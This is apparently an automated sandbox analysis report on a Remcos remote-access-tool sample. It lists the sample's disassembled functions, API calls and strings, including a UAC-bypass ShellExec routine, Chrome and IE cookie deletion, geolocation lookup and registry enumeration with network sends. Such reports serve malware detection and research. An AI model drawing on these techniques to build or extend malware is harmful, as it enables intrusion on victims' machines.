                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1324828854-0
                                                                                                                                                                                                                                            • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                                                                            • Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A
                                                                                                                                                                                                                                            Function 00401768 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 142threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                                                                                                                                              • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,00475B90,00475C10,?,0040179E,00475C10), ref: 00433534
                                                                                                                                                                                                                                              • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475C10), ref: 00433571
                                                                                                                                                                                                                                            • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                                                                                                                                              • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                                                                                                                                              • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475C10,?,004017C1,00475C10,00000000), ref: 004334E9
                                                                                                                                                                                                                                              • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475C10,00000000), ref: 0043351C
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                                                                                                            • String ID: T=G$>G$>G
                                                                                                                                                                                                                                            • API String ID: 1596592924-1617985637
                                                                                                                                                                                                                                            • Opcode ID: 88022268fe3ca53b7ee126a34617c6b967d0ef3f346763fa63774eaa4140af22
                                                                                                                                                                                                                                            • Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88022268fe3ca53b7ee126a34617c6b967d0ef3f346763fa63774eaa4140af22
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E
                                                                                                                                                                                                                                            Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                                                                                                                                                              • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                                                                                              • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                                                                                                                            • String ID: TUFTUF$>G$DG$DG
                                                                                                                                                                                                                                            • API String ID: 3114080316-344394840
                                                                                                                                                                                                                                            • Opcode ID: de4befe685273e7bf067e3fe47780df676ebf89a32a955f1e6b39ea8039125ff
                                                                                                                                                                                                                                            • Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de4befe685273e7bf067e3fe47780df676ebf89a32a955f1e6b39ea8039125ff
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                                                                                                                                                            Function 00437A90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437ABB
                                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437B51
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437BD1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                            • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                                                                                                                                                                            • Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
                                                                                                                                                                                                                                            Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                                                              • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                                                              • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                                                                                                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                                                                                                                            • API String ID: 1133728706-4073444585
                                                                                                                                                                                                                                            • Opcode ID: bbd59c4342a3f048f0a7499dd9cd327f959f912607a0dc40202ba9ee31ab275b
                                                                                                                                                                                                                                            • Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbd59c4342a3f048f0a7499dd9cd327f959f912607a0dc40202ba9ee31ab275b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE
                                                                                                                                                                                                                                            Function 00455913 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                                                                                                                                                                                                            • Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669
                                                                                                                                                                                                                                            Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 0040FC0F
                                                                                                                                                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                                                                            • String ID: p[G
                                                                                                                                                                                                                                            • API String ID: 2536120697-440918510
                                                                                                                                                                                                                                            • Opcode ID: 34d2c97419ff9ea43b4d99934c17e21ff42c81eb248cc24d2bbad1ad966fea40
                                                                                                                                                                                                                                            • Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34d2c97419ff9ea43b4d99934c17e21ff42c81eb248cc24d2bbad1ad966fea40
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D
                                                                                                                                                                                                                                            Function 0041A52B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
                                                                                                                                                                                                                                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5C3
                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5C6
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • http://geoplugin.net/json.gp, xrefs: 0041A55E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                                                                                            • String ID: http://geoplugin.net/json.gp
                                                                                                                                                                                                                                            • API String ID: 3121278467-91888290
                                                                                                                                                                                                                                            • Opcode ID: 277b3accc4d7b5025d2c7427303433e7431fc8b467990071231497c86fa6234c
                                                                                                                                                                                                                                            • Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 277b3accc4d7b5025d2c7427303433e7431fc8b467990071231497c86fa6234c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA
                                                                                                                                                                                                                                            Function 0044FCEB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044FD39
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044FD44
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044FD4F
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044FDA3
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044FDAE
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044FDB9
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044FDC4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                                                                                                                            • Instruction ID: b610107d28af63220697d29f7fc6270dd0ec529a0d2d9973413717ad3690abbb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5116071581B44ABE520F7B2CC07FCB77DDDF02708F404C2EB29E76052EA68B90A4655
                                                                                                                                                                                                                                            Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\iGhDjzEiDU.exe), ref: 00406835
                                                                                                                                                                                                                                              • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                                                                                                                                                              • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 0040688E
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\iGhDjzEiDU.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                                                                                                                            • API String ID: 3851391207-459172085
                                                                                                                                                                                                                                            • Opcode ID: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                                                                                                                                                                                                            • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                                                                                                                                                            Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 0040FEF2
                                                                                                                                                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                                                                            • String ID: h]G
                                                                                                                                                                                                                                            • API String ID: 2536120697-1579725984
                                                                                                                                                                                                                                            • Opcode ID: f9aa0e65a7bbfdd7a7f79a788d404fc3f4b750e419fadc6b529989e89958da83
                                                                                                                                                                                                                                            • Instruction ID: faa6495482ffb760010bfa20be6f485864068761b5f97391b19e5f0bde606c56
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9aa0e65a7bbfdd7a7f79a788d404fc3f4b750e419fadc6b529989e89958da83
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10119D3190041AABCB24FBA5C8468DDB7699E85718B20057FF505B72C1EB78AE09C789
                                                                                                                                                                                                                                            Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                                                                                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                                                                                                                                                            • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                                                                                                                                                            • UserProfile, xrefs: 0040B2B4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                                                                                            • API String ID: 2018770650-304995407
                                                                                                                                                                                                                                            • Opcode ID: f29ab34f5f3b23139b2c689574f5439d44e644a4acc68cd0207f5b0faff05a8e
                                                                                                                                                                                                                                            • Instruction ID: 57831ae66bbe87b328e3caf482cfdb9a18bfb77b2c204d956758bc207329a0f7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f29ab34f5f3b23139b2c689574f5439d44e644a4acc68cd0207f5b0faff05a8e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED01A23164410557CB0477B5DD6B8AF3624ED50708F60013FF802B22E2FE3A9A0586CE
                                                                                                                                                                                                                                            Function 0041BEC0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                                                                                                                                                                                                                                            • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Console$AllocOutputShowWindow
                                                                                                                                                                                                                                            • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                                                                                                                                                            • API String ID: 2425139147-2527699604
                                                                                                                                                                                                                                            • Opcode ID: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                                                                                                                                                                                                                            • Instruction ID: 29466b5f89b818b32aee09a22b3208d506810ef61d6e100b210d0f7536d9046d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F0121B1980304BAD600FBF29D4BFDD37AC9B14705F5004277648EB193E6BCA554466D
                                                                                                                                                                                                                                            Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: (CG$C:\Users\user\Desktop\iGhDjzEiDU.exe$BG
                                                                                                                                                                                                                                            • API String ID: 0-1807716158
                                                                                                                                                                                                                                            • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                                                                                                                                                                                                            • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                                                                                                                                                            Function 0043960C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 00439799
                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 004397CC
                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 00439801
                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1992179935-0
                                                                                                                                                                                                                                            • Opcode ID: b8fade3388712e20a6f67c03e6901a2274372487572bf270bb9750812de2a36e
                                                                                                                                                                                                                                            • Instruction ID: 580a0d75dc01f3f4b0c8d364acae3af6b21ca74026922d198920ae34195595c3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8fade3388712e20a6f67c03e6901a2274372487572bf270bb9750812de2a36e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8581FC71A01B069BE724AE69CC82B5F73A8AF89368F24512FF411D7381E7B8DD018758
                                                                                                                                                                                                                                            Function 00444B4D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
